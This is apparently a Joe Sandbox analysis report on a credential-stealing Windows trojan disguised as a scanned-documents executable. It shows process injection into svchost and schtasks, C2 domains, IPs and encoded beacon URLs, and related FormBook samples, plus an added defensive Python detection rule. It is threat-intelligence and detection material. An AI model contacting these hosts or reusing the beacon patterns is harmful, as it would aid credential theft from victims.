    signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
  -> svchost.exe (started)
       signatures: Maps a DLL or memory area into another process
    -> XraVxjqYYo.exe (injected)
         signatures: Found direct / indirect Syscall (likely to bypass EDR)
      -> schtasks.exe (started)
           signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        -> XraVxjqYYo.exe (injected)
             signatures: Found direct / indirect Syscall (likely to bypass EDR)
             network: www.slushcafe.top 203.161.55.102, ports 54135, 54136, 54137 (VNPT-AS-VN VNPT Corp VN), Malaysia; synergon.space 109.95.158.127, ports 54123, 54124, 54125 (DHOSTING-AS Warsaw Poland PL), Poland; 8 other IPs or domains
        -> firefox.exe (started)
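The chain in the behavior graph is a user-launched executable starting svchost.exe, that svchost.exe starting schtasks.exe, and schtasks.exe starting firefox.exe. Process-creation telemetry sees only the started processes, so the relationships between them are what a detection has to key on. The following is an added example, not part of the Joe Sandbox report: two parent/child rules run over constructed, Sysmon Event ID 1 style records that mirror the chain above. PIDs and image paths in the records are assumptions of this example; the report gives only image names.

```python
"""Parent/child checks for the process chain in the behavior graph above.

Added example, not part of the Joe Sandbox report. The events are constructed
to mirror the chain the graph shows: the sample starts svchost.exe, svchost.exe
starts schtasks.exe, and schtasks.exe starts firefox.exe. PIDs and image paths
are assumptions of this example; the report gives only image names.
"""
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid image parent_image")

SAMPLE = r"C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe"

# Constructed telemetry; PIDs and paths are arbitrary (SysWOW64 assumed because
# the sample carries 32-bit/WIN32 strings, the report does not state the path).
SAMPLE_EVENTS = [
    # benign reference: svchost.exe started by the Service Control Manager
    ProcEvent(900, 700, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe"),
    # the chain from the behavior graph
    ProcEvent(4812, 3300, SAMPLE, r"C:\Windows\explorer.exe"),
    ProcEvent(5024, 4812, r"C:\Windows\SysWOW64\svchost.exe", SAMPLE),
    ProcEvent(5240, 5024, r"C:\Windows\SysWOW64\schtasks.exe", r"C:\Windows\SysWOW64\svchost.exe"),
    ProcEvent(5388, 5240, r"C:\Program Files\Mozilla Firefox\firefox.exe", r"C:\Windows\SysWOW64\schtasks.exe"),
]


def image_name(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def from_user_path(path: str) -> bool:
    """True when the image lives under a user profile (Desktop, AppData, Temp ...)."""
    return path.lower().startswith("c:\\users\\")


def find_suspicious(events):
    """Return (rule, pid, detail) tuples for the two relationships in the chain."""
    findings = []
    for e in events:
        child, parent = image_name(e.image), image_name(e.parent_image)
        # Rule 1: svchost.exe is normally started by services.exe. A parent that
        # runs from a user-writable path is the high-confidence form of the rule.
        if child == "svchost.exe" and parent != "services.exe":
            rule = ("svchost_from_user_path_parent" if from_user_path(e.parent_image)
                    else "svchost_unexpected_parent")
            findings.append((rule, e.pid, parent))
        # Rule 2: schtasks.exe does not normally create child processes at all.
        if parent == "schtasks.exe":
            findings.append(("schtasks_spawned_child", e.pid, child))
    return findings


def ancestry(events, pid):
    """Image names from the oldest known ancestor down to pid."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    chain.reverse()
    return chain


if __name__ == "__main__":
    for rule, pid, detail in find_suspicious(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid} ({detail}); chain: {' -> '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

Rule 2 and the user-path form of rule 1 are the high-confidence parts; the plain "svchost.exe not started by services.exe" form needs baselining on a real estate before it is alerted on, since some Windows components start svchost.exe themselves.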

Antivirus detection for the initial sample

Source | Detection | Scanner | Label
Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | 76% | ReversingLabs | Win32.Trojan.Strab
Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe | 100% | Joe Sandbox ML | -
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
URL detections

Source | Detection | Scanner | Label
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark | 0% | URL Reputation | safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js | 0% | URL Reputation | safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://hm.baidu.com/hm.js? | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js | 0% | URL Reputation | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css | 0% | URL Reputation | safe
http://www.slushcafe.top/irn0/?dZo=rkk12BbGqxBZ8yyWFarCeZT80GKzND/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdyK4b8CTwfAsUn2lCVR5NZfuQrKb84WQ==&gta=rzqXf4A02FEl_8 | 0% | Avira URL Cloud | safe
http://www.mqmsqkw.lol/jda9/ | 0% | Avira URL Cloud | safe
http://www.alanbeanart.com/7ie4/ | 0% | Avira URL Cloud | safe
http://www.alanbeanart.com/7ie4/?dZo=dUG4+DDdp/sjDloUpc1Pa9oz3rcpcCK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLlnR8W+DQIbNoQ2kneVhnOJg05D70cg==&gta=rzqXf4A02FEl_8 | 0% | Avira URL Cloud | safe
http://www.8xbe578.app/1nsp/?dZo=6szqGuj1zCBS7eEWPK4Hj+gRK/nLAiE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080e6UseLZVk0HIGeIsBEAgRXg1wr3NJQ==&gta=rzqXf4A02FEl_8 | 0% | Avira URL Cloud | safe
https://track.uc.cn/collect | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://www.lfghtko.lol/yxos/ | 0% | Avira URL Cloud | safe
http://www.a9jcpf.top/mpex/?dZo=Zb/vXsPYNAfjWKU6DONX2DmivYpazk1zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3VTZ4C1VoYJ2+BjO5oufoKkfdfMAaow==&gta=rzqXf4A02FEl_8 | 100% | Avira URL Cloud | malware
http://www.rtrpodcast.online/l2ei/ | 100% | Avira URL Cloud | malware
http://www.lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&gta=rzqXf4A02FEl_8 | 0% | Avira URL Cloud | safe
https://dhosting.pl/bledyhttp/domeny.html | 0% | Avira URL Cloud | safe
https://dhosting.pl/img/logo.svg | 0% | Avira URL Cloud | safe
http://www.lecoinsa.net/7ffx/ | 0% | Avira URL Cloud | safe
http://www.lfghtko.lol | 0% | Avira URL Cloud | safe
http://www.stemfiniti.com/toda/?dZo=obOL9JCgNxwS4++f28d79f/ijUfggy2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPePyq+6ekfY+odIcNiDDxjsozDdHvvMQ==&gta=rzqXf4A02FEl_8 | 0% | Avira URL Cloud | safe
http://www.synergon.space/8unq/?dZo=RkvL3PdT4df/OPkOf449nqUAFGXcSYeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6m5z8EhJuaQ15Cv8EbgH9K+rgnKqPuIQ==&gta=rzqXf4A02FEl_8 | 0% | Avira URL Cloud | safe
http://www.slushcafe.top/irn0/ | 0% | Avira URL Cloud | safe
http://www.zhuan-tou.com/pjmu/ | 0% | Avira URL Cloud | safe
http://www.a9jcpf.top/mpex/ | 100% | Avira URL Cloud | malware
http://www.tqfabxah.com/zjwj/?dZo=nHLCZn8vN2ArVDTu2n5oID6vRNbj9hrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZXyXWPQEhmyBEuX+CqEarOAabuvO7hw==&gta=rzqXf4A02FEl_8 | 100% | Avira URL Cloud | malware
https://dhosting.pl/kontakt | 0% | Avira URL Cloud | safe
http://www.lfghtko.lol/yxos/?dZo=GsI4mtIQVr1bqd+WnFq+jxjWo9OGL2g8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR3g5VMmjRWjtblZDXQIQIDqIzGBnVicw==&gta=rzqXf4A02FEl_8 | 0% | Avira URL Cloud | safe
http://www.tqfabxah.com/zjwj/ | 100% | Avira URL Cloud | malware
http://www.kacotae.com/rdfm/?dZo=wrkGspiQ383g8BvTCApReourbo49wGJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvPUBNIOaE5m9808ARfJeYmxykw2Zy3w==&gta=rzqXf4A02FEl_8 | 0% | Avira URL Cloud | safe
https://dhosting.pl | 0% | Avira URL Cloud | safe
https://dhosting.pl/bledyhttp/hosting.html | 0% | Avira URL Cloud | safe
http://www.kacotae.com/rdfm/ | 0% | Avira URL Cloud | safe
http://www.8xbe578.app/1nsp/ | 0% | Avira URL Cloud | safe
http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbr | 0% | Avira URL Cloud | safe
http://www.mqmsqkw.lol/jda9/?dZo=34snQIO0a+qzYlkumKI+eaAwv3nNcrL7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZNMDgqEYgAwPZ0d7uU4aGTG2kjdzpwg==&gta=rzqXf4A02FEl_8 | 0% | Avira URL Cloud | safe
http://www.zhuan-tou.com/pjmu/?dZo=zh3d17Jww7lUdSTktMhNBhMmvkGT0/ltGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GOxg8UddFklL4THbJOpCVHjpswub4FA==&gta=rzqXf4A02FEl_8 | 0% | Avira URL Cloud | safe
http://www.synergon.space/8unq/ | 0% | Avira URL Cloud | safe
Domains

The Antivirus Detection column is empty for every entry and is omitted below.

Name | IP | Active | Malicious | Reputation
kmdne.ajunsdfancsda.com | 216.83.33.145 | true | true | unknown
stemfiniti.com | 3.33.130.190 | true | true | unknown
www.lfghtko.lol | 116.213.43.190 | true | true | unknown
8xbe578.app | 3.33.130.190 | true | true | unknown
alanbeanart.com | 3.33.130.190 | true | true | unknown
www.mqmsqkw.lol | 116.213.43.190 | true | true | unknown
www.zhuan-tou.com | 38.12.1.29 | true | true | unknown
rtrpodcast.online | 76.223.67.189 | true | true | unknown
www.tqfabxah.com | 35.241.42.217 | true | false | unknown
www.lecoinsa.net | 217.116.0.191 | true | true | unknown
synergon.space | 109.95.158.127 | true | true | unknown
www.slushcafe.top | 203.161.55.102 | true | true | unknown
www.kacotae.com | 64.226.69.42 | true | true | unknown
www.alanbeanart.com | unknown | unknown | true | unknown
www.stemfiniti.com | unknown | unknown | true | unknown
56.126.166.20.in-addr.arpa | unknown | unknown | true | unknown
www.a9jcpf.top | unknown | unknown | true | unknown
www.winkthree.com | unknown | unknown | true | unknown
www.rtrpodcast.online | unknown | unknown | true | unknown
www.synergon.space | unknown | unknown | true | unknown
www.8xbe578.app | unknown | unknown | true | unknown
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.alanbeanart.com/7ie4/?dZo=dUG4+DDdp/sjDloUpc1Pa9oz3rcpcCK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLlnR8W+DQIbNoQ2kneVhnOJg05D70cg==&gta=rzqXf4A02FEl_8 | true | Avira URL Cloud: safe | unknown
http://www.slushcafe.top/irn0/?dZo=rkk12BbGqxBZ8yyWFarCeZT80GKzND/TKAT51RD3LUS3uLR6Pe1z8Bplr8mj2yMFe4BX6hO/FEyyRDMjbgdyK4b8CTwfAsUn2lCVR5NZfuQrKb84WQ==&gta=rzqXf4A02FEl_8 | true | Avira URL Cloud: safe | unknown
http://www.mqmsqkw.lol/jda9/ | true | Avira URL Cloud: safe | unknown
http://www.8xbe578.app/1nsp/?dZo=6szqGuj1zCBS7eEWPK4Hj+gRK/nLAiE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080e6UseLZVk0HIGeIsBEAgRXg1wr3NJQ==&gta=rzqXf4A02FEl_8 | true | Avira URL Cloud: safe | unknown
http://www.alanbeanart.com/7ie4/ | true | Avira URL Cloud: safe | unknown
http://www.lfghtko.lol/yxos/ | true | Avira URL Cloud: safe | unknown
http://www.rtrpodcast.online/l2ei/ | true | Avira URL Cloud: malware | unknown
http://www.a9jcpf.top/mpex/?dZo=Zb/vXsPYNAfjWKU6DONX2DmivYpazk1zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3VTZ4C1VoYJ2+BjO5oufoKkfdfMAaow==&gta=rzqXf4A02FEl_8 | true | Avira URL Cloud: malware | unknown
http://www.lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&gta=rzqXf4A02FEl_8 | true | Avira URL Cloud: safe | unknown
http://www.synergon.space/8unq/?dZo=RkvL3PdT4df/OPkOf449nqUAFGXcSYeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6m5z8EhJuaQ15Cv8EbgH9K+rgnKqPuIQ==&gta=rzqXf4A02FEl_8 | true | Avira URL Cloud: safe | unknown
http://www.lecoinsa.net/7ffx/ | true | Avira URL Cloud: safe | unknown
http://www.stemfiniti.com/toda/?dZo=obOL9JCgNxwS4++f28d79f/ijUfggy2g0sHVZkybihQ0FoV35C0OF1DRqfJh8iiswTwJQUV87m+YN/qkLbPePyq+6ekfY+odIcNiDDxjsozDdHvvMQ==&gta=rzqXf4A02FEl_8 | true | Avira URL Cloud: safe | unknown
http://www.slushcafe.top/irn0/ | true | Avira URL Cloud: safe | unknown
http://www.zhuan-tou.com/pjmu/ | true | Avira URL Cloud: safe | unknown
http://www.tqfabxah.com/zjwj/?dZo=nHLCZn8vN2ArVDTu2n5oID6vRNbj9hrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZXyXWPQEhmyBEuX+CqEarOAabuvO7hw==&gta=rzqXf4A02FEl_8 | false | Avira URL Cloud: malware | unknown
http://www.a9jcpf.top/mpex/ | true | Avira URL Cloud: malware | unknown
http://www.lfghtko.lol/yxos/?dZo=GsI4mtIQVr1bqd+WnFq+jxjWo9OGL2g8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR3g5VMmjRWjtblZDXQIQIDqIzGBnVicw==&gta=rzqXf4A02FEl_8 | true | Avira URL Cloud: safe | unknown
http://www.kacotae.com/rdfm/?dZo=wrkGspiQ383g8BvTCApReourbo49wGJxXTgxDOVN343rP+tlYZO/fXuOHfGNTjam/0/D7Ya5sDuP+VmElkMvPUBNIOaE5m9808ARfJeYmxykw2Zy3w==&gta=rzqXf4A02FEl_8 | true | Avira URL Cloud: safe | unknown
http://www.tqfabxah.com/zjwj/ | false | Avira URL Cloud: malware | unknown
http://www.kacotae.com/rdfm/ | true | Avira URL Cloud: safe | unknown
http://www.8xbe578.app/1nsp/ | true | Avira URL Cloud: safe | unknown
http://www.zhuan-tou.com/pjmu/?dZo=zh3d17Jww7lUdSTktMhNBhMmvkGT0/ltGm9RdVCgVGhfN4W3cKL6T1z80tBiQSN9EuR6w+tbLdSr4eDL0g7GOxg8UddFklL4THbJOpCVHjpswub4FA==&gta=rzqXf4A02FEl_8 | true | Avira URL Cloud: safe | unknown
http://www.synergon.space/8unq/ | true | Avira URL Cloud: safe | unknown
http://www.mqmsqkw.lol/jda9/?dZo=34snQIO0a+qzYlkumKI+eaAwv3nNcrL7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZNMDgqEYgAwPZ0d7uU4aGTG2kjdzpwg==&gta=rzqXf4A02FEl_8 | true | Avira URL Cloud: safe | unknown
URLs from memory and binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark | schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp; schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp; XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js | schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp; schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp; XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://duckduckgo.com/ac/?q= | schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js | schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp; XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://track.uc.cn/collect | schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp; schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp; XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dhosting.pl/bledyhttp/domeny.html | schtasks.exe, 00000009.00000002.3811492832.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp; XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.lfghtko.lol | XraVxjqYYo.exe, 0000000A.00000002.3811962670.0000000005491000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js | schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp; schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp; XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dhosting.pl/img/logo.svg | schtasks.exe, 00000009.00000002.3811492832.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp; XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dhosting.pl/kontakt | XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://hm.baidu.com/hm.js? | schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp; schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp; XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dhosting.pl | XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dhosting.pl/bledyhttp/hosting.html | schtasks.exe, 00000009.00000002.3811492832.0000000003EDC000.00000004.10000000.00040000.00000000.sdmp; XraVxjqYYo.exe, 0000000A.00000002.3810037675.0000000003A0C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js | schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp; XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbr | XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000036E8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | schtasks.exe, 00000009.00000003.1808662563.000000000765E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css | schtasks.exe, 00000009.00000002.3813151529.0000000005C10000.00000004.00000800.00020000.00000000.sdmp; schtasks.exe, 00000009.00000002.3811492832.00000000046B6000.00000004.10000000.00040000.00000000.sdmp; XraVxjqYYo.exe, 0000000A.00000002.3810037675.00000000041E6000.00000004.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
35.241.42.217 | www.tqfabxah.com | United States | 15169 | GOOGLE (US) | false
217.116.0.191 | www.lecoinsa.net | Spain | 16371 | ACENS_AS Spain Hosting housing and VPN services (ES) | true
76.223.67.189 | rtrpodcast.online | United States | 16509 | AMAZON-02 (US) | true
203.161.55.102 | www.slushcafe.top | Malaysia | 45899 | VNPT-AS-VN VNPT Corp (VN) | true
216.83.33.145 | kmdne.ajunsdfancsda.com | United States | 64050 | BCPL-SG BGPNET Global ASN (SG) | true
38.12.1.29 | www.zhuan-tou.com | United States | 174 | COGENT-174 (US) | true
64.226.69.42 | www.kacotae.com | Canada | 13768 | COGECO-PEER1 (CA) | true
109.95.158.127 | synergon.space | Poland | 48896 | DHOSTING-AS Warsaw Poland (PL) | true
3.33.130.190 | stemfiniti.com | United States | 8987 | AMAZONEXPANSION (GB) | true
116.213.43.190 | www.lfghtko.lol | Hong Kong | 63889 | CLOUDIVLIMITED-AS CloudIv Limited (HK) | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1494558
Start date and time: 2024-08-18 18:23:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/5@15/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 51
• Number of non-executed functions: 281
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe, UsoClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target XraVxjqYYo.exe, PID 4756 because it is empty
• Not all processes were analysed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• VT rate limit hit for: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
Time | Type | Description
12:25:03 | API Interceptor | 9759248x Sleep call for process: schtasks.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 217.116.0.191
  Scanned Docs from Emnes Metal Sdn Bhd_.exe | malicious | FormBook | www.lecoinsa.net/7ffx/
  HSBCscancopy-invoice778483-payment87476MT103.exe | malicious | FormBook | www.lecoinsa.net/i4bw/
  Request for Quotation - (SM Store San Mateo).exe | malicious | FormBook | www.lecoinsa.net/zd4t/
  D02984-KP-002011.exe | malicious | FormBook | www.lecoinsa.net/7ffx/
  REQN#1010135038.exe | malicious | FormBook | www.lecoinsa.net/7ffx/
  pismo1A 12.06.2024.exe | malicious | FormBook | www.lecoinsa.net/xu8t/
  RFQ for Maintenance usering for Sabratha Project.exe | malicious | FormBook | www.lecoinsa.net/zd4t/
  CFV20240600121.exe | malicious | FormBook | www.lecoinsa.net/xu8t/
  Nbvkrvfanxfmla.exe | malicious | DBatLoader, FormBook | www.captoriot.com/pn4e/?KfTD=TVbisx4cAYlWi1QWASjGfV1crgLBR8JtvsCp22pQc6hP3WdU+qw/hnDLngBsYyNwe7SkJXu6Y4ccrmt/HgV2tQEycSxLeHUr9w==&pd=8k02Xq71ReL2NgiL
  fJXbhkbAh4.exe | malicious | FormBook, GuLoader | www.metabolomicsrubio.com/he4z/?iY0=3flPJv6ieGjXtu2BZjlDCLsRYPXaTlSmnAGDaGGFSllhsjO/k4Cp7cSc5yNsqXbWoVnAdcraHliC8m1hOte1JfoJWxEBFbScRA==&m5h_Y=eBnFNQLxHa46YDho
Match: 76.223.67.189
  PO TIYEY078K.exe | malicious | FormBook, PureLog Stealer | www.srripaspocon.org/5if5/
  Botulismus56.exe | malicious | FormBook, GuLoader | www.osbornesargent.co.uk/md49/?Oh=QPM+w8Ig1ROzmMib5SDu6zuYSnXOkQr9m7samoBwdfEnV0n0l3uWLVJ7UGPwsRh8pmtmt+CAU5h/xYkYsyOGxbf0SN0yaP11Hv40L4ijSawEYWA0VnDvvTA=&sxilk=HBrl
  Scanned Docs from Emnes Metal Sdn Bhd_.exe | malicious | FormBook | www.rtrpodcast.online/l2ei/
  SecuriteInfo.com.Win32.RATX-gen.24742.674.exe | malicious | FormBook, PureLog Stealer | www.stellardaysigning.com/xb5p/
  mtTw7o41OC.exe | malicious | FormBook, PureLog Stealer | www.microsofr.fun/omnp/
  Payrol list.exe | malicious | FormBook | www.rtrpodcast.online/g3rq/
  LisectAVT_2403002B_448.exe | malicious | FormBook, PureLog Stealer | www.magnauniversity.com/hfhf/?6lBX5p6=A/Xwur6vfkk1nt0HF5vI+iD3HQmsBnVKlXfi47Zpsj5D+hS3O7IepQPDfrVs1xyfsUFv&Kjsl=FbuD_t_HwtJdin
  IIMG_00172424.exe | malicious | FormBook | www.stellardaysigning.com/xb5p/
  eqqjbbjMlt.elf | malicious | Unknown | mgsdaigou2.com/
